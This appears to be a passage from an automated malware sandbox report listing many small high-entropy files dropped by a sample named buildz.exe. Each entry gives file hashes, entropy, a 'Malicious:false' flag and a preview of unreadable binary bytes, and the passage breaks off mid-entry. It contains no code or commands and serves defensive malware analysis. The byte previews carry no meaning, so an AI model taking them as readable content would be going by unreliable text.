.}i03...n..[>K1,..h....s..C{.o.>C
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848117685246658
                        Encrypted:false
                        SSDEEP:24:kmD1qJwvYBKoUtl+AXkt77smYNDy2BwrfLYCczQJEkTDhH6OFohHP4GbD:zkWgFU3+EkR7sU2B9jNkPhXFoV4UD
                        MD5:5A17942C06930C54C3A3B5F995865C94
                        SHA1:DB47946097EE117403C7052E50F64D2D2C8507BE
                        SHA-256:0DD2F6829809E444926084782E22E2B47B4FFEDB0F0CCA3DF658E2513376957F
                        SHA-512:AC98869674836AF492B0F0391BCC2D5FAB46ACCC2353D6FF4C2AACFD111E05D28E263EF6EB07E99E7BCC5FB3B4BA1D5EF5A27BFCE16CF2E22A462CF9C1EAECA9
                        Malicious:false
                        Preview:GRXZD..a.....F.h...\/b....ta.k.w.>..kz...>.._.".....n"..V. g.02...V7.NX..0n?..&^070.gW..u-.}/..w+.........A.;v......Q.@aN....m.{}......B<k....X\.Wq....;x....{...3#.f..:&;A....Fl..f.>..Vh.F5......S...........f..@a..?.}lu..8............c.Rh...Xf.).....!.2...g...V.}z....^.S... ..#.|.Xi.....$.U..Tf..a~..2.W..}.`HJ9.75........X.}c|Y.]}....#+.....`.%K2.G.5...K?...u..Z.>...K......7...R.PeA6+L.....*J(q^ ..eg.,t..e.b.....K....\..#U.2..:q.7..t].[.y[...]...\...[.s.W.,.....<.-..[pWM.......8Mm..*..X.;...M............"aq.zJo..........2c.&.....w..YwI..!.C.s6\..P.....I..3-.Z.....p.m/.zE...lv..\.Y.g.x..~...^G[K.......S3=...f.kr.T..u.G..T.~KL.;.O....}..f.`..|q#:..TD...N....w>..i1......Q^.+......?x/.l.....Q...a:r^.i.:..:.......u...0J.../.z3?.^........vM].b}F..5..."\g./.Y.m...Ao.(....5t.G....W.....(......T..}.....vp.!.s.A........."..4.H....f.<..A7....0 .N..6f.(..]... ..vML....S..~.N.b]-Z.t....}.".....WM/....p.n.@..7.....{..qFja.sH...r.B....+u..x..d..~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.854896592401753
                        Encrypted:false
                        SSDEEP:24:YB7pFRbOkiePMHL4itnx5NY4l0DSR759wXvgkKapU1CWV2Qp+LsFUOhNSohb9R4p:YB7pFRbhie5iJx5NtlrRd9wXIkKaNWVu
                        MD5:49AC05113C941C809B77DE62047D05AC
                        SHA1:F7881DB7E5A8AA4E3CB142B96824BFF370BB6F2F
                        SHA-256:5D10D7B930CEAEC7289263390A719809E5716474C560AC2559619A9074C0C345
                        SHA-512:2B7157DC9EF2AB921EFF092ABA22C72B3C659DAF1C37D08FE9AECC9467CB9E86A607C1CF51DFD094B21B2A55B942EFE2D7D8C5E7AF31D851D4A06108E3FD912E
                        Malicious:false
                        Preview:GRXZD.-o.k..Q..3.{...%...'?FDXF.P.....R@t.v.O..\..sjU........T;`..x..p..Pj.l..FL1..<..a$..#}@D...8..P.Xq..p.|...?.).E..t..3....a....../G._...>..a..T.(......)...&..69<.....!.Fr....Do.P7. ..L............6..*.e..y.......p.J..HZ<`..X..C.A....|......=...'e..!.......T..b.)..4..(.0G9.6o?.T.c....g..A$.!....O...E.'F........m1._....(6...OG...*.o.....K2.....5*.....B.I{..q5...4.......@.....A.%...}......|G.Y.g L....ky..|C.I........O....Tr...txD.....~..<.LE.*....0.%.+.b3.F..4ZE...X.s.)G....$|C....?c.....Y`^...J%.lw.N=.....n<URg`\....I........]1Z.|........6yM.O.,:e...R.^._jO..}.c.4..R.o.....'...A......1.Y....W..t".........q.I......4.G.zz%..n.......DF....B.z...Q(.f.r.S...0..W.].)..:..N;...\.....c.....T.~.5...E.....;....0R.r.:..y).q.M...3....)6<Xt....5...P.c.]..(. m..8.r.2.Y3y..>..e...BO......8..==|........<..IXB....W,.W.jm...S.~n.({......d_...M6..-3.75.Ji.CN.j.Q..,.^.z8R?,.1R.\.k.4.[^C.....A.x.......\..C...v.jGX.U.*..._H.R.........\3..h..WrK4.}Z..j..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846505234821355
                        Encrypted:false
                        SSDEEP:24:XtErsubg9a5ganusJuwzfNrONFEByA8XBfVSVCrmHI6FiFqjAF3i5vqROj++tKUw:94suk9aGAuwzVrI6YhVuWmHPANi5yRO6
                        MD5:1B3E5F01F94B2AEA2CE0A472CA8D1354
                        SHA1:9DBD2A5749A902AD1C47FFDA1DFFFBE25931FA0F
                        SHA-256:3ED30A65623BE73549BE96F22EF52E70C2E20A916AF194827671CE2E83E74185
                        SHA-512:7B41D9FFB30B4AE8FF258B6FD4E2A9F538E139FF2C1A613B57284B8AABF8964FAEDE663FE4F7FF2649B466A22DD7C65813D3632A5A640001B401F69D8011DD9E
                        Malicious:false
                        Preview:HMPPS....(1.M.#..2.\...!.Z..Hu.Aav.v.n4...,x.A.*..R.....a.$..m.....f.~...^.G.hhM.N$......1=(kv.1...N...F.*{V......^..E...0..V./.[..zH.@q...&....m...;Qw.'.v...t.iEx.\@K/.9Zy:.m,.9.o...G..R..3....r~jZ..!....Q]L..s...k...B....<.6b.....PT..0.F*"...s...9.aHu...X5..]8..).k'..........zF...9.oh.g......R.8. y|....-&kC...g....3..#.+..l....n..m/...*5....K../.T..n...g..i.n)-8....B.i.%o.<?.....,....e+.Kl.../.;........s&..0*.H.?.[m.Q+.4....Y...>.......y.D....._.$.......]J.5.....F.j........Pc.....u....#G...J.lS...|0.fWG..hu.0ok7.....S.......5j.2..5.h.........k.!}........_......n.=.[........&p...=s../....:d.i..e..Jc.............bw!......MI.B....?F<..C..J..O(..q+ \...c....Dp..v......x%.KS..:g..*..w]o./.."...F.3..8M.....Z.<$U..Q....i.K}6'./.Pt..N-..K..|.!r.I&...'.<......k.l.i.<1.....{..w.Y..s\.E4-......'..X.>..C.3..Q?...&..F.nA.v.....M0K..h....w0o.Nq...m..........w.p.W[1..J.BjC...n+2i....\..7...=...K...C70..ur)b..[j:.Y.o...p^....#...M8...n?.#u%.....b..."=A.^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.840487081848331
                        Encrypted:false
                        SSDEEP:24:ZEOh9HJ40+FAc0+3krn70cIReLiq9BAx/XW4+VwIFlnbU3MAPdep4GbD:nh9p40oAc0vnoLWiqS/XUzLngbl64UD
                        MD5:56BA3D9DBD80C918948EF9CB12AFFA83
                        SHA1:7BC108C0B169716FC60B69C2F6BD67611C5238FE
                        SHA-256:A9FC74B36FE2E365A9AA2A086E14801DDDA90DEBA024C04A3FDC1761032FEE3F
                        SHA-512:CB7951FC793FFAD8971F936FFC23B38FD65DAFB63448EE4E63D7B503AA06778C9F87D6B24CF5408D0AC1CCFB9F23A9A97A7589F9BFCE6453B72DF5BD193BCA81
                        Malicious:false
                        Preview:JUSNI^qt...-^..N.|..xK...46:.Y.U....i.c.O...!...."0+Se#.!.];.vb........d..nL......."u..o.6).7.hT!8..z..d.gL..(L.y.kP.1.D.z...z.(;.....mB....W.Vl..'q........x....Ef....OM..@.Xn|....y}p..PtD.u1..Hg..s0@.X....M...!.\P|.... ..d..'.....|.dG;..|..+X...^a...<n.4......"+.v.mf.U..Nsx.....).j..h...+.s.....0N..l.rT..M.?...q..E....Hb........%..@.t.$..p.WuS ....Gs.!...3...1..{G..T.NM.-...R...M..];.....I.|.J@.n...Y.2.b..F.x.t{9C,.......B.H.....6.......-^<.......3. .....2._.3.C.u.-..hZ.%+..p#..~..4x....6.C....k.%"......"p....R.....a.>..r.(\...:$...m.............{.O.......n...2.U8.!Ha.|%................Z......:.{*i..:8..#|..k9.....i....5J?P-P..$,.m..C.;dX.F[n8y.LQ..(.Y...pS....n}..!".7.....^K..?|j6.UN:U.7....&.|.Z...;.s.T8....B...l5.@.g\,....&{..m..A...D..<..._.i...t.....(..:...\4.....;.~k..~.......Q\..~.....PC.""TF?~..4S0...M....y6,&G_3.|...0.........X.#...d.B0..."....]....JV....H.V@w!:.}..Jp&...Mg.. ...K2......].l..2.n.N.Q<({..:A.zP....:&.@...{.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.84030653128179
                        Encrypted:false
                        SSDEEP:24:bKi4blQSA+KRQ/RbFulgcL0CMRQQ7oPM/QoU3drH1YhMdtNu7noANT1Ie/QIuHH0:eDlQSvdylgc5c7oUVY9V2AcNTF/QHDUD
                        MD5:D32AAA2A85305ADF578FEFADBCB74064
                        SHA1:604AA37EE7A1F382FA05C0DC736DC260B14F8045
                        SHA-256:A1C48A152164BA36F12C41C3333768D3E024B34B3170ECE26D598A383239D5B9
                        SHA-512:201B49B3E70BFD16027457C18D2F35A5A97685FBFA21E3628FA87469D6938EC5B967EFB207A4FBA142D7F35E959F6A4379A10DF91F2434FFCB1B5288185F1139
                        Malicious:false
                        Preview:KLIZU..%UU..Qq..*A..$..o.D_..U.E.3=.*./',.|.Y5......:...|.[.{..t.ZM`.Mq.3[.2u......,g6){W4ituaY.k..E{<5N.5.j=.#..Oe+..I.1.....o.&...D[|k..&.w....e.K..)2].Bf<PN4..(5%..=.[.w...].N.p.|..*5....bf....a,..Yi.J,U.... ..i.@..?..W.&.$.X..g...Q_'..<.lMAV.H4..M..Q}. ..S.n.`..&"5...S.UV...V......U.?....0..x...}k.m.d..|.y..}...s...I...E...H:....fHE\......".`2.AQj#..M..^k..E!..m.\....c>..v..i4..yB....!.K...[PG..q.....8l..1....D....4P....{8...*.y..0.z8....UU.G.:i..Q.6e....n..k..!...Y..+@..1.h...E..-....M.(.D.b...Ry.-.H.G./....o'6...v;=k.....2......mB.r.`5.....8 ..ca..}.....BNRM.....S'.B......I.N.d.5.B..>....ma..v.E8.*W.S.B..<..OX..T\.q...|o8..S...n........nQ..Q u.....!...5....p...{.Sx.;....Z...?..S...0..W$........q..-.....K..'..Xe..}..}MU.~ Uu....nZ..Nt4..=g].E.]..3i...,D1..~=..*3.1.......D/.n.....p.Nh.\1..G.lW.%....lJ...G!.....n..i.{.f8.....S..''.b.C......4..'2..m.I.A.)..(e......UV....Z....L._..'......eP...O#.E.V'...M....B.......%..S97C.F....q....@..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.841162143743496
                        Encrypted:false
                        SSDEEP:24:bmWcNRGhoF76YTwwk8V9e/ORj/fjMWlXcVLmYNqgNO/+lpajteObOP0vI/l99aGX:rYZFmoww/aORjIWlMVLLqHWCteObOPNr
                        MD5:115AA1421F027B13A8347290D7E434A4
                        SHA1:B5C3BD010C5F399D297B39DABF61F74203812FA0
                        SHA-256:915FD4FCAD6C035C7C607159CF90B1AD6855CAFD165C11098A26E0D379CB1DF9
                        SHA-512:440DB99F0F6A32D54EAC96F774A5662AE4AD613E8EE21D64B793CC5D0CEFAF290B135E1020969B086B2C704C88F69B2EF134407FD9F4CC9097380877AAB40A37
                        Malicious:false
                        Preview:KLIZU...~...A.NN.j\.....D(0......m...a|.L.4.kk.2z.....V..]&... 1..HI.$...@.7.&.xtzI....h.....G..\v..@.0.$...J.......1..;..Z..j.A...N..#...U...=..T.Nk.KF/..?$`/Z2.*s..r0..F.w..D.Q.}+T?...I.t.......d.k....N..jx..h.:..HX..)..G..B..o...=....3~%re.a.../...z...2..A7..t.-.L.....3{]...n...{...C...~F.........*...'.._.jm..M8A........:....>.1...o4d\.$_...\.n8....*R`,s....c.9..X0..$O....9........#....9...,.....5dB.t..<;`..t...0....,.....X.w...!..lT.I...o..4....6EI.0.q...S:...is...k^..Gbk$.$.Zg....F..5J$'Qu..4....W..b...3.inmL..T..L.`.0.....vh..........g...i{...v(.G...J.8...@.+.....}=.`..mh.Y...EYm%.?7.m.Tj......Q|:.]...Y.~.............Q.Rhcv...T........U.1[............!.........=I.....~..hu.DL..u.L....3\[...a..qm.h.B@.$g<.F....7...I.r_.H.2..d4.....rd.[~+...hE.\*2Y..W...T...(g.fbk.]T.v... `<....)..H...5,....'.v...wg.ESh.I.(O...$..FY..c..`.Q.FwN.z....(yJ.{..)I...{.%*+.7.`.w8..Hn...s"I.).s?.9b\7.>...~.._.......c.....N...$.L.....=.$..._.......:.-..D.\.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.835217579907756
                        Encrypted:false
                        SSDEEP:24:bDCEcUBng0881RT1tbELJgBcz/7BEndeOV4lKySuioWQ5VUbdTby/y9LqoLg+Qgm:n1g2T10icz/YdeO2lHSjMUbRHL1Lg+Qt
                        MD5:FB73A5293342BEEF8C21448F3EAD1F9E
                        SHA1:22FA0D8CC1295623D945446BAE3EBA53335FFE3F
                        SHA-256:477F9254F6FD72571033353B8ED96876F5778130D849323DE95755DA0FD4F442
                        SHA-512:E5E9A79EA972748A38E93BF5C610FEFD30729D05BE46D61C3BE00C5067ED0DDB180ACED4FBA987ECF8A0BE740DD2BA676C362DAFEC717BF5B45329BF14EF7B2B
                        Malicious:false
                        Preview:KLIZU|...x.._]..z.]3...Y...#H....>B.pK.......6..&..$......C._.)....*K.-.l..B.o._&a.I1h.w..^m.e.....y...8B.M{M9u.(.!..ew`b..=Z.a...X...#..(......i..._..-...T+.b...;...M...8.0..B..<..pH..?:...0.1TL.n..k-fZ..r...i.'&...&B..A.-..Z0.yK.@.....@....6...[>..E.M....T...,..W.d...N^8.6".e,..G..4.k..W.z..>.(MW'...K^...>.... e...2^....}..Q.{;y-N..,..D......JU....5r.p...1.>=&....f..H2...2..~7g....T...e.n.C.hV.<...O6.).)../.=..a.G..7:...L-d.l.....\.qr.Q.........[q.F5....:..z..P....g.6..%..L.1..J...lmE$......p(.$.U...C~.......Y*...8J.Xj..Z.T.A.hs.l.....G6mm2.>.=.2.F.A.4.......0L..\T;x..F.6G. ..\4...'...C......u..C....l.<....F.v..K.=....QEad.t..`.%....z..K..8.....u.+.Rf@..1....W.'@n.........(...E..wc.C..z.-+....N...g..d.....k......6#..35|...P...z.s.L.x..)c../.....p...9....+?......V...s.Wt.@5.....>|..R..yF..VL[knfC..M....Hk~.b@A..4|M{\G....).?...8.(PHZ....U..{7n8..O.&AHJ..]H*.O.e.....)..........B/+.d$..MsF.^.........~.n.4....k.8tE.ei.9JJ.$.ylK...W...M......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.875862162643627
                        Encrypted:false
                        SSDEEP:24:hJYA2Eq+eXvV2djfj085HwkTbAK+gB0D01Y68N92d2AkHW4T0z2Z1mOq3fGbD:huARq+vRQCvbX+gB0D01Y6pd2B2Y0z25
                        MD5:B1AD634D2ECBE6A0AD7E9DF4F99C81F1
                        SHA1:CB3A2A3F6DBC49771E1346D0D2AF59301759C260
                        SHA-256:C965D6BFBB78C2D15D2AB000217E615A0A670465138BBCEE2B864434C714C32D
                        SHA-512:3C1B2E56CD989B4E5A1076C1D123614AEAEEABB89EC27759520734F5305D6258295DDC7015CC67B3BE4C20BC20A6E0B6276C415D28E37E0E0119B8BF2D9F219F
                        Malicious:false
                        Preview:LCMFM.kc.=.....y...J&,)m.-&>rpX<.$Y.....}....J.T...6...w.e.a...iuH.`.q@.3.B.u....<..V>....>.1)(..5.....1...j#.r..{Np.s..=..~.\3x.P..Q.._.+.......k..y.!..Z.../p.U....N.}.\..|.%.O..d..H...].U....G...4......$).k.....n..../o#9b..u.......u..<*Y.:.16.E:...".*P..P.R6..:.Q.f.I^.(m...."Kl..T7..|d............:_...T....,..G...n..d>.........g;.p.d........mLX.t.:#..2W..R.K..ao....&.rs.j%.+..7H.a$..38.\.).T.......-.E.M"A..|..Y...:.wjH.&..F..z....w2....O.i.........s.......(DE...........B+..I...=h.e.R.6....p!.f.]...Q2.\.|.N...7.y@m..;.C.....R..y.s%..X.....&".&_B.%v..!f..a,..(......oc....Z....T\.a8...!i......_..lG.L....}...Eb......@.4q....l.<...[~.Q.7pW......K.. ..mY~...}.`Si.N2...c..\..:.,...@1c~.!...A<..A.....+1.XI.y.)...d.c...3..@O..>.g..i..O...........C_....L....f.I:....|.<...;.....3D...S.._Y.@........B...0..}..........3..U......CWK....U.Cq...d...&A..m.....I.H......S]...S......iB.....[.?apmC...........]^.........'|.] .
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.861870059534083
                        Encrypted:false
                        SSDEEP:24:fZiCmMA1bPCl99NlZi6SYiopwUL1mlYd3ptze8uu9fMaKCg5Be+y5QwDM4ZqGbD:f0tW3iYiCwtlYB3a8uaPQBGQzFUD
                        MD5:33FF83144C4D24651B64C50ACC053F1A
                        SHA1:A6B9E26CBF78EC0DD660346A629F1027C76A7715
                        SHA-256:855C8DF142FF4CBE4E153C4AC50AD7328C857066FDC238C81FAC559B36EC0DF1
                        SHA-512:D440B16FEDC2667FB5BECB3A8BE50E208CFD16E5EE57C4D3BB99550586FF4FEFC6B07368A44E1F58EAACD94BA3DDAB6B102EE72F5C2DE48CB17E018E4A17CDAD
                        Malicious:false
                        Preview:MDCSJ~..~yQ,.5_s%.V......ps..*..=..Yl._..R.G...hb..`E.8..D..r~......51..(.*....R..6)...<A...B.B..o.E.pt.O..l1Z_R;...Fi.e/C..Q..........=...s..j6W%.r.cX~.EEn...T.%.{..........x.X...^...1w.'d.&..)C....X.{.I.w...|..#.,VJc....x...A......m.....P.W..t......yI. ...8L./..n.D-H..Xa..v}[..qE:.....Wl}.,-..<<..X...?Y...'2...N.$.....V.G..;.....mx.-L.s.:`.R..e0...........`...K..tNB.G.#...................-n.i.N.....KKm.a..h..d.../B.{..R'1.(.z..8-.w4..w.*.........#.KA.A.h.Ch..../m....o..y?..~.~.ZS.n.|r.b^...V-..#.)!E..._..U./......\.~p..?..=n.#(.@....;0.rys.....4Z.51....f".j&....n.i6...0.Q.B.V....=......F..n80.P.....W.k.o r.S.>.XY.[.a.X.O....a(..^I..l.GA.$,(.;.Z..!#N|.....S0}....6..c..roqb"R@%.]v..T.i...q.em.............._..M... ..&H.$.s...M.)t....@.CJ..qU.D....X.2.d4p..kl.0..zd=...Q...d...)...n.M........U.."..R..%.........TLA....K.iFuH...T..e.....V....?r$.L.~Q.]..&9J.^(x..P....7.2s.....JDY3uZvd..}m..y..T.o.r..%..M.$`5n1....Y%........R..)......'.).]2..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8520203834185684
                        Encrypted:false
                        SSDEEP:24:FKjiz8wwY6x/Ej4qcPu6XTf4cLGEvo6KcKFfhLcokGbD:FKq8wwBDTf4cLZo6dKFfhkUD
                        MD5:0C8B1B12AB054A9578C3FAB6BCA0E2AB
                        SHA1:49788A247353EF88547436440FE835BCED0A6851
                        SHA-256:B8532BE3991CAC0C5CBE5E959133884A413FBB80BF31519D8F98FDA2EBEF765C
                        SHA-512:A22D32CFB40ACEF2A15541316646ABBE45D8A5533C9580061DA34D6C9F8EC7D05C834185122F58A929F1686FEA9B210632A3E6D44FEFE9DB052D8F3113067007
                        Malicious:false
                        Preview:NVWZA3...y..AB.G..xHqR..I{k9H.".......]..Kw..NJi.......O x..r9.m.C..ei_&.".XHM.~`.T..l.Y<N...D...F...}.%u.;(!.....w..I.U.....0.. ..... ..z._.s.k..[%.4$.PkXxri..]Y...O..P..S....Y...Xu.I....s........`.c....A...?j...[..o.L.<Zv.).r9...6.?l.G.F......b.L.O....J.o`.....Q$oco.?..&3..vL.d....B.tk...Mv.#h;,....H.Qi..D.M.........3;..m...q.1.5..2.#.Vf....eI..>.$-.+....s...=....]u.....h9....,......#.@.E!.;.f.F..&........s...i....h...k.x6n..N9.x......=.u.....Y/...........k7>.=.T;.....do...5i.L.?y.=..t9c......Y.P.....fzv.E...a/...J%.n...}......I...+..D.vZ0.].`|....N:t.f....H!_.P.#.~.w..>..CM.V.Ki.l.<.Z...m...v..v........,.....)....Nq{..8k....[L...M....2.X.J~.,h....C.A ..N..>..."..a...H..(Y.......<.O....Z.y........l...P......."a8...........v.r?...a..lo.._/8.p..U..j...f)3#.<..G9.\CW...|.@..M..p..jC.....0?h+J..<..I.....^....1%.....2..%...:.<E....Q(.&*...../F.<.*BS.........g*......>../p....5.Z.Y..!..Zm.E-....-u..e&..vCy.s..{.D&.U.b..7....o.lM^, ....|.G...@.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852586270070853
                        Encrypted:false
                        SSDEEP:24:5fxzidaQoBuB/JYm2sHYnVHFdqfmiSE3BT4Lq446mr061zO5pUKGbD:XzidaQoYB2m2V5qpx0LUTr0mzO5aKUD
                        MD5:CDA49E4401D2861CE17D4ABB6268A145
                        SHA1:E7196E8C31AA9A8F1F62D8F025C45B5AD42FEF3D
                        SHA-256:63CE5FABE18EC706E9A3C01E713608ABEE31860F356FCAAB209242BD1E3DDD72
                        SHA-512:BE014CEA37FDF78F4A8DCBEAF8C753C2ACE09F0403AFE03DD5B4D886D7C071C94385F8C27EBFC41F5FE6FA10DE84137EEFE424350A198D9A1492790C3C79DD4E
                        Malicious:false
                        Preview:NWCXB2h...y.x.Y..H.]....70TM..j...s..........).-$u|.:+.13..q.h_%.:AT..f.hp..4....{..F#.o....L..r.d.G..B...m....a.9...t..-.'...B.GxjoG.3[.V.......R.M.^o...X.3.Zi.._....X.7.yO...9.w..R.&:.%b....]....Y{.....Xw"..*a.IB.WS.sZ.XGx..<X.....o...(.kmM.......m..t.D.....q......j.S.....%io.Y....)...j.+....t...H...nZ:..v%...F5]B.......%...`....;$..[..y.2....u=..%.(:j+.o.=..}B......t.wtJ........s..<.s..|..Ub.nMp..$...22{...,.*I...LP.......3.1z..;..N._&.kuQL....0-..F....#......pk._U^..-.F/.~....x^..#p...G..}..4|n|.5...%...r...u+~.....pr.#.\...A.:P...a.%...x-q*....T+m...n7..Ue`.-..0....T-j|?.....4\)..L.."....b .*....&...Ui..C|W*..|.......'.o.........k.........*h.C...pd..-.....u&.@.....nM.K.h?;.......3.P.KHkG.n.s.....G..e...k...................&2Q.ybv.....W:..St.4.z.1.b1.IX.`x.;..4p. .v.`t.J..x.z...n#...E..46........?.!xx./i..lw.....<.X....C+....dK...1 .@d@?'....s....?..1..`)...l.._|..v:.^....yw.V[...........I...L.u....U/;..hz.Oz....&....>,........Q...k
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844825195041434
                        Encrypted:false
                        SSDEEP:24:6GGpUU7lF9iu4RO0SeaTnOvoxfFnBzFHgCimAa9vgrgkyelKln/nlxPt36iW7GbD:3473wuoSbTnOvoxfFnBzFdXUHlKVNVt7
                        MD5:4BD876EFF4EF280AA532EC39D0C64928
                        SHA1:1794202988FA87E89E4F19AB2A3B2726E2AA9D3F
                        SHA-256:C8A337929082F4C367C4F1D656DB421D1BC7EF9A2840514DAAAD8F21280DCDFC
                        SHA-512:939FADFABEE177D6BB3485D17F546F48E7939495B5961884DFF016D37B95550FE4D4D21BFCB5114C7FC47B7A7FECF83BB761CC9FCB53A2060FBF324A0EB131E4
                        Malicious:false
                        Preview:NWCXBc.903....z.Bp...u)....}..~.Y.?.t.F......C2.."......l..k..g...C..|.L.......>.U..../.....1.;.;..<..<..SY#]r*\.2...6I;....t.D#.y.....N.]...[|6h.*.mZ(;E3v.D4..0...N.....J....z7D...d..N.s.a..J:'..".Y....1.Q..K..8.)m...K........u!.."..Y..y.'j..-.UC.a.iw....R..o.........*{.W-z.H..;..x.'....6..2mk....Q......./A.....M{i.oa(....;...p...H.e}C..Q.d)..,.+...7.......h.qT...........4..;#....)m6g.2@I.u.2N2...u.... ;$.:~..oJ...*.~xG.6.f.Z;...$E......u....C.....*...6...4(e.?..+.3.o.,eX.\=..D..G.ZQ...P\.*.R.,...O.H..1."...Z.4]...W....I`.$.q.f.D.....Y.<%...p.FJ..[*..,.!wnA....6.i}_C.U.f......i..4..D....id.F..n..=..+<M.T.}..$w.m"V}.".....#...[..Q....+w.hSb.E..&0.}.:.:.......$..+.._.....?...S......@|.2..|.3e).K.=..5..CQb..f...&.6....~(.CY.%..%.d.pAu..(GD...E........RkZw...).!.Xn.4sx3.[...w...|.S+S..5T.o..yc.C...ejs...,$..!...5...a.L0...d2@S...?...U..@...%.p.kn...]E..o9..\.Ht.....4..O.A.@.J.0?.'..(..Rj.A.8..U.EX.u.7!^....R.i#..9f..:..[ZF.....q..=q..)...^o...Q.#oc
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.826912192118389
                        Encrypted:false
                        SSDEEP:24:JInJoWlMC4S9dbRfzIQdatV9UGo4ijAacaciAkwKLHZDMN4zPtpGbD:Sn59d1LGjFovUacXkwKj5NtpUD
                        MD5:A2091FB8EAC3586A7DCD128D60B34402
                        SHA1:E4C59849128B5B70102A4E7F4A629726CD496884
                        SHA-256:E486EFA5E56A47B8AFE4346271C45C8E198B884B5433D39751AB2838AEFBB518
                        SHA-512:C169B66B64A1376F1ABA1062292EE5250ECB6EA1ABCE9EA367AB0A8E949AF1EAC647EC31197BAA15CD84DA3C863ACAB798C262FDCD6F1AC90B0777377AAAE436
                        Malicious:false
                        Preview:NWCXB.>.h.;..J.vF.}..u...Ne.]).:....r.<.kUn.g..^$..Z..x....< ...O....l..R.........6.....q....)k.\e.....Ke|...g.,...G.t..Lq.{.-PSI..b/...K=...5..P1mg61..=(qe.z....P.b!....Z..._.l.V..3.Z .Z`...u....q.@.~.OV<.<}..pk.^fO#..uRu...V..^=.25D.......kh._.$:k..1...^=..^tCX..W'N.....C.'DZ....]NH..1<9..L9{x.....g..y.Y)T./....=.l...1.h{^e..Q...i!."....\/.9.H...2P :L........z.....A.V...IX..<.T....q.....Y.%#w..k.....'m5.....eA.f.U^Ee..p.).....AZ..S.6.....P@;E5.....%.......N.C..^{G........D.T5..Q...6..$..cA.....?..$.&....\.Z.9....]B4Du..6M..V.."...F..Z.|D..>@$y.0..7.*..I.D.1....N:..Mj.R...r.d.O..&....z..w...&...N.C.E.F....J..z.J..W....m..2.)g.,>j....;.J[.yc..8...1fL.".M....%.x........H...k..7........5C...2-.D.d.h.......+"..vg..g..k...iJ&..&.c..."6.g.,..:.....b.@PM?...S.....,......1%R.@Dy4T9..TXL&..{....`.izQ..........S&4 5J../...m..[....S..,..5...l..j.!..A......X..|..Py.b^M|.6.'...W.c.|..7...Q....R...u.m.2.-Vp.....x/_.4.._.jk&.v.fo..1..R=.Z.Q..[tN..'..:.M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.877329192997203
                        Encrypted:false
                        SSDEEP:24:mZBYPafxE1MFz5JvQrBETfL9hSTNurxExbVGvEwzfWD8hCA/vApifHkztQ22rIvr:G+PezPvmuLbEucbVGEcfWg93Mifr/VGJ
                        MD5:CCD80921701C08062AA3CE8606472201
                        SHA1:86343A9FAECDCE295863EFC313DBCB85265A89AE
                        SHA-256:65B4B9E2E161D4184BAF79AC88FE50B5D99C79578E4623EE5EB3564932770BD3
                        SHA-512:85E735062448B0C1B36636B21AA388C0D14BA1B88D84D64388EC8C2C9ACB1F59630A8911108A92B754748CB1DE0DFA443C265B1F60AA59BC03E7D56FCC570751
                        Malicious:false
                        Preview:NYMMPw..."...@..=.t.../..n"O......".:7.q.Ve].aV.. |Q....#..d...P.a.BTXCi...._...^.F......J(.......x>:..F".i`<O.sQ.I......r.#.6.u...A..8...8........Yo.....z..&.r..69.....K&.z ..,.a.Yl......j..we...3...7.H..,^Z[..#....i\.g.~8..x@:8G.yY5..K.!..r.2m.$..a..>..4]....XH....V.DXO...S....>.>..:o;..D.;V...yr...'1.....}....Rgc.l..A..m5.V..E,..f....8...E_.09..i...y.o.Ox...y.Z#...%............x.X.dN.Q|.. .U....[.C....$i....HZ.)hE......38...Q...&.t.....g....L,...7SO~..$*..j..+....@......q..Q.r..j....o..c......h..p.]7.&..c....@z...t..Y...~...>0..0Y.._k.\S.f.2%..gj.D.....K..@yD|..+....o.....EC..Ux>c\.....[.s.FU~..'..`.....]@v....h*..K.t.....r.........6r..0m.[.w.w.7..4a....x......G...g...R.L.{.......:..#...aU,.s...f...;.}.....Y.<L..K..PC..Ob6. ......J.p..'.:..r.v..{.....3Y.3...v....z.Lv...%...1,t."....w.^.VW.[.....ug...)=..;J5......\.Cy.......T..K.}z}...........R..h-..:kC/.ZR.n....,.c....._nL..._..<...9....S...:..3.x...{.{Y......$.....s......p.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8516757487971365
                        Encrypted:false
                        SSDEEP:24:jGePUOi3+ie6RYNAqmgmE8aZ2QxJB2aUmQXI+BJN6k9qr5BhS8wMxNoNWHGbD:jGexi32jP9mEI9bY+BJNX2BheMxNYWHA
                        MD5:481AE9486FD68C9145741FB7206A97E2
                        SHA1:5961D85B9E37D58700936604041862EA88971B04
                        SHA-256:B6E7C27F35596559A7F4E68122BE3C49F876019C051DA7ED62C6AB103EB6D81D
